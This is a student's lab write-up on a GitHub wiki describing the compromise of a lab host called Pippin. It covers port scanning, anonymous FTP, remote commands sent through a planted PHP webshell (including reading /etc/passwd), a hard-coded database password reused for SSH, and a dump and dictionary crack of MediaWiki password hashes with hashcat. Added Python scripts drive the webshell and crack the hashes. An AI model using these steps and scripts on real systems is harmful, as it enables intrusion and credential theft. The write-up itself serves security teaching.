Exploiting Pippin - tmansfield42/Tech-Journal GitHub Wiki
Summary
In this lab we did a full run-through of passive recon, active recon, initial access, discovery, and privilege escalation.
Process
Deliverable 1. Provide screenshots of open ports, their services and versions.
Deliverable 2. Provide screenshots of the services as they respond to client applications like web browsers and command line clients.
Deliverable 3. Have you found any of the services particularly interesting? Please explain using annotated screenshots and brief captions or descriptions.
nmap -sV -O -A 10.0.5.25 to find open ports, their services and version numbers
- Found a misconfigured FTP server that allows anonymous login. You can log in with
ftp 10.0.5.25 using ftp as the username and pressing Enter for an empty password
Deliverable 4. Upload a test file (give it a distinctive Safe for Work name) and provide proof that you've done so in the form of screenshots of commands and output.
put michael.txt creates a file called michael.txt in the current remote directory. I had to cd into /~/upload to have permission to create a file.
Deliverable 5. Provide evidence of remote code execution
If you look around the files available over FTP, there is one called simple-backdoor.php in the web root. It takes a cmd parameter from the HTTP request and executes it server-side under the Apache user, so any command can be run from a URL like this one:
http://10.0.5.25/simple-backdoor.php?cmd=cat+/etc/passwd
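The same request, driven from a script instead of the address bar. This is an added example and not code from the lab or the course; it assumes simple-backdoor.php is the stock Kali webshell (/usr/share/webshells/php/simple-backdoor.php), which hands the cmd parameter to system() and wraps the output in a <pre> block. The response it parses is constructed, so the script runs offline; the live transport is only used if you point it at the lab box.

```python
"""Talking to the simple-backdoor.php webshell programmatically.

Added example for this write-up, not code from the lab or the course. It assumes
the file is the stock Kali webshell, which passes the `cmd` request parameter to
system() and wraps the output in <pre>...</pre>. The sample response below is
constructed, not captured from the target, so the script runs offline.
"""
import re
import urllib.parse
import urllib.request
from typing import Callable

TARGET = "http://10.0.5.25/simple-backdoor.php"  # web root of the lab box

# Matches the <pre>...</pre> wrapper the stock webshell puts around command output.
_PRE = re.compile(r"<pre>(.*?)</pre>", re.DOTALL)


def build_url(base: str, cmd: str) -> str:
    """Percent-encode cmd into the query string.

    quote_plus turns spaces into '+', like the hand-typed URL in the write-up;
    '/' is kept literal so paths stay readable, while ';', '&', '|' and similar
    are escaped so the remote shell, not the query parser, sees them.
    """
    return f"{base}?cmd={urllib.parse.quote_plus(cmd, safe='/')}"


def http_get(url: str, timeout: float = 10.0) -> str:
    """Live transport: plain GET, body returned as text."""
    with urllib.request.urlopen(url, timeout=timeout) as resp:
        return resp.read().decode("utf-8", errors="replace")


def extract_output(body: str) -> str:
    """Return what system() printed. If there is no <pre> wrapper (a different
    shell, or a PHP error page) hand back the whole body for inspection."""
    match = _PRE.search(body)
    return match.group(1) if match else body


def webshell_exec(cmd: str, base: str = TARGET,
                  fetch: Callable[[str], str] = http_get) -> str:
    """Run cmd through the webshell and return its output. `fetch` is injectable
    so the pipeline can be exercised without touching the network."""
    return extract_output(fetch(build_url(base, cmd)))


# Constructed stand-in for the target's reply to ?cmd=id (not captured from the lab).
FAKE_ID_RESPONSE = "<pre>uid=33(www-data) gid=33(www-data) groups=33(www-data)\n</pre>"


def offline_demo() -> str:
    """Exercise the whole pipeline against the constructed response."""
    return webshell_exec("id", fetch=lambda url: FAKE_ID_RESPONSE)


if __name__ == "__main__":
    print(build_url(TARGET, "cat /etc/passwd"))
    print(offline_demo())
    # Swap in the live transport only when pointed at the lab box:
    #   print(webshell_exec("id"))
```

Running `id` first is worth the extra request: it tells you which account Apache runs as, which bounds what the RCE can read and write before you start poking at /etc/passwd and the wiki's config.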
Deliverable 6. What did you find and how did you find it? Can you leverage this data to your advantage?
- Do some more looking around: if you're in the upload directory, run cd .. to go back up one directory and you'll see the LocalSettings.php file. Type get LocalSettings.php to copy it to your local machine.
- Look at the file and you'll find hard-coded credentials under the "### Database settings" entry.
- You should see a MySQL login with the password 1Tookie.
Deliverable 7. You should be able to get into pippin as an authorized user. Provide a screenshot showing your session and cat the user-flag.
Password: 1Tookie (the database password from LocalSettings.php, reused for the SSH login)
Deliverable 8. Enumerate this internal data source to determine where and in what fields useful data might exist.
Once you have this SSH session, run the following:
mysql -u root -p
- Password is 1Tookie
SHOW databases; - lists all available databases
USE mediawiki; - switches to the database called "mediawiki"
SHOW tables; - shows all tables in that database
DESC user; - shows all the fields in the "user" table
SELECT user_name, user_password FROM user; - outputs the "user_name" and "user_password" fields of the "user" table (the passwords are stored as salted PBKDF2 hashes, not plaintext)
Deliverable 9. The credentials you've found are not terribly useful by themselves, you will need to use advanced hash cracking techniques to get what you need.
Copy the hashed password you see for Pippin and paste it into a new file on your local machine. It should look something like
:pbkdf2:sha512:30000:64:7zMbdjXKrFDDq4CRF5q9ow==:49ImFWdWRVz2dCDsJPj+P0Xovz153VenjKk7npuK7u5xgo21IUh+eY0QH8fQxdH/Cjx3zxZyQcfNChAnP11GNg==
The fields are :pbkdf2:<algorithm>:<rounds>:<output length in bytes>:<base64 salt>:<base64 digest>. You need to reformat the hash so it actually works with hashcat: mode 12100 (PBKDF2-HMAC-SHA512) expects sha512:<rounds>:<base64 salt>:<base64 digest>, with no leading colon, no pbkdf2 label and no length field (SHA-512 output is always 64 bytes, so nothing is lost). An online write-up showed me how to do it. So in this case, I took out the "pbkdf2" and the "64" from the hash, leaving just the parts hashcat needs.
I made a new file called hash.txt whose contents looked like this:
sha512:30000:7zMbdjXKrFDDq4CRF5q9ow==:49ImFWdWRVz2dCDsJPj+P0Xovz153VenjKk7npuK7u5xgo21IUh+eY0QH8fQxdH/Cjx3zxZyQcfNChAnP11GNg==
Also, in the interest of time, I used our professor's hint to shorten the rockyou.txt list down significantly: they said the password begins with a lowercase p, so I ran:
grep '^p' rockyou.txt > rockyou1.txt
Lastly, the actual hashcat command:
hashcat -m 12100 -a 0 -w 3 -o pippincracked.txt hash.txt rockyou1.txt
- -m 12100 is the hash mode we need (PBKDF2-HMAC-SHA512)
- -a 0 is a straight dictionary attack
- -w 3 is the high workload profile
- -o pippincracked.txt is the output file
- hash.txt is the file of hashes it checks
- rockyou1.txt is the wordlist
hashcat finished in 1 hour 10 minutes and pippincracked.txt had these contents:
sha512:30000:7zMbdjXKrFDDq4CRF5q9ow==:49ImFWdWRVz2dCDsJPj+P0Xovz153VenjKk7npuK7u5xgo21IUh+eY0QH8fQxdH/Cjx3zxZyQcfNChAnP11GNg==:palentir
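The reformatting and cracking steps above, done in code so the field mapping is explicit. This is an added example, not part of the original write-up nor of MediaWiki or hashcat: it parses the MediaWiki :pbkdf2: format, emits the hashcat -m 12100 line, recomputes PBKDF2-HMAC-SHA512 to check a candidate against the stored salt and round count, and applies the same '^p' trim as the grep. The stored hash is the one pulled from the lab's user table; the short candidate list at the bottom is constructed.

```python
"""MediaWiki PBKDF2 hash -> hashcat -m 12100, plus an offline candidate check.

Added example, not part of the original write-up or of MediaWiki/hashcat. The
stored hash is the one pulled from the lab's user table; the candidate word list
at the bottom is constructed. MediaWiki stores
:pbkdf2:<algo>:<rounds>:<length>:<base64 salt>:<base64 digest>,
where <length> is the derived-key size in bytes.
"""
import base64
import hashlib
import hmac
from typing import Iterable, List, NamedTuple, Optional

STORED = (":pbkdf2:sha512:30000:64:7zMbdjXKrFDDq4CRF5q9ow==:"
          "49ImFWdWRVz2dCDsJPj+P0Xovz153VenjKk7npuK7u5xgo21IUh+eY0QH8fQxdH/"
          "Cjx3zxZyQcfNChAnP11GNg==")


class Pbkdf2Hash(NamedTuple):
    algo: str
    rounds: int
    length: int
    salt_b64: str
    digest_b64: str

    @property
    def salt(self) -> bytes:
        return base64.b64decode(self.salt_b64)

    @property
    def digest(self) -> bytes:
        return base64.b64decode(self.digest_b64)


def parse_mediawiki(stored: str) -> Pbkdf2Hash:
    """Split the colon-delimited MediaWiki format and sanity-check it."""
    parts = stored.split(":")
    # The leading ':' yields an empty first field.
    if len(parts) != 7 or parts[0] != "" or parts[1] != "pbkdf2":
        raise ValueError("not a MediaWiki :pbkdf2: password hash")
    _, _, algo, rounds, length, salt_b64, digest_b64 = parts
    h = Pbkdf2Hash(algo, int(rounds), int(length), salt_b64, digest_b64)
    if len(h.digest) != h.length:
        raise ValueError("declared length does not match the digest")
    return h


def to_hashcat_12100(stored: str) -> str:
    """hashcat mode 12100 (PBKDF2-HMAC-SHA512) reads sha512:<rounds>:<b64 salt>:<b64 digest>.
    The leading ':pbkdf2:' label and the '64' length field are dropped; SHA-512 output
    is always 64 bytes, so the length is implied."""
    h = parse_mediawiki(stored)
    if h.algo != "sha512":
        raise ValueError("mode 12100 covers PBKDF2-HMAC-SHA512 only")
    return f"sha512:{h.rounds}:{h.salt_b64}:{h.digest_b64}"


def check_candidate(stored: str, password: str) -> bool:
    """Recompute PBKDF2 with the stored salt/rounds and compare in constant time."""
    h = parse_mediawiki(stored)
    derived = hashlib.pbkdf2_hmac(h.algo, password.encode("utf-8"), h.salt,
                                  h.rounds, dklen=h.length)
    return hmac.compare_digest(derived, h.digest)


def make_mediawiki(password: str, salt: bytes, rounds: int = 30000,
                   length: int = 64, algo: str = "sha512") -> str:
    """Encode a hash the way MediaWiki stores it; handy for building test vectors."""
    digest = hashlib.pbkdf2_hmac(algo, password.encode("utf-8"), salt, rounds, dklen=length)
    return (f":pbkdf2:{algo}:{rounds}:{length}:"
            f"{base64.b64encode(salt).decode()}:{base64.b64encode(digest).decode()}")


def filter_prefix(words: Iterable[str], prefix: str) -> List[str]:
    """Same trim as  grep '^p' rockyou.txt > rockyou1.txt  in the write-up."""
    return [w for w in words if w.startswith(prefix)]


def crack(stored: str, words: Iterable[str]) -> Optional[str]:
    """Straight dictionary attack (hashcat -a 0) in pure Python. Fine for a short
    list; hopeless against rockyou.txt at 30000 rounds, which is why hashcat."""
    for word in words:
        if check_candidate(stored, word):
            return word
    return None


if __name__ == "__main__":
    print(to_hashcat_12100(STORED))
    # Constructed mini word list; the write-up reports hashcat recovered 'palentir'.
    candidates = filter_prefix(["password", "Pippin", "palentir", "qwerty"], "p")
    print(crack(STORED, candidates))
```

check_candidate is also the quickest way to confirm a hashcat result before you try it on the wiki login: if the recovered word does not verify against the original MediaWiki string, the hash was mangled somewhere in the copy and reformat steps.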
The password was palentir for the MediaWiki user Pippin (the account whose hash came from the mediawiki database's user table, not a MySQL account).
I went back to MediaWiki (10.0.5.25), logged in as the user Pippin with the password palentir, and made myself a page because no one had done that yet.